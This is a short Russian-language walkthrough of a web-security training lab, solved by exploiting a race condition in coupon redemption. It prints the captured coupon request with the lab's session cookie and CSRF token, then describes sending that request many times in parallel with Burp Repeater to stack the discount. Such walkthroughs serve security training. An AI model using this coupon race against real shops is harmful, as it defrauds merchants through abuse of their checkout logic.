Лаба содержит уязвимость типа Race condition. Для решения необходимо купить Lightweight L33t Leather Jacket. Для входа доступны креды wiener:peter.
https://0a30007f04cd108d814b48510086008f.web-security-academy.net/
Solution
Мммм… Скидка
Ладно, нужно хотя бы зайти в аккаунт) У меня даже есть 50$. Добавлю нужный товар в корзину.
Вижу поля для ввода купона. Попробую ввести что-то рандомное, чтобы получить сам запрос:
POST /cart/coupon HTTP/2
Host: 0a30007f04cd108d814b48510086008f.web-security-academy.net
Cookie: session=BKim35Hz5P2eYaCmeLCD3TpoOSB09yq3
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:139.0) Gecko/20100101 Firefox/139.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0a30007f04cd108d814b48510086008f.web-security-academy.net/cart
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Origin: https://0a30007f04cd108d814b48510086008f.web-security-academy.net
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
csrf=OIuypoh9kWVUNuxpjxiRErXjIfio43od&coupon=random
Теперь введу нужный купон, но отправлю его множество раз. Для этого создам группу запросов в Repeater, выберу параллельную отправку и накопирую запросов:
Через нескольно попыток у меня получилось добиться выгодной цены)))
Покупаю)
Безумные скидки Лаба решена
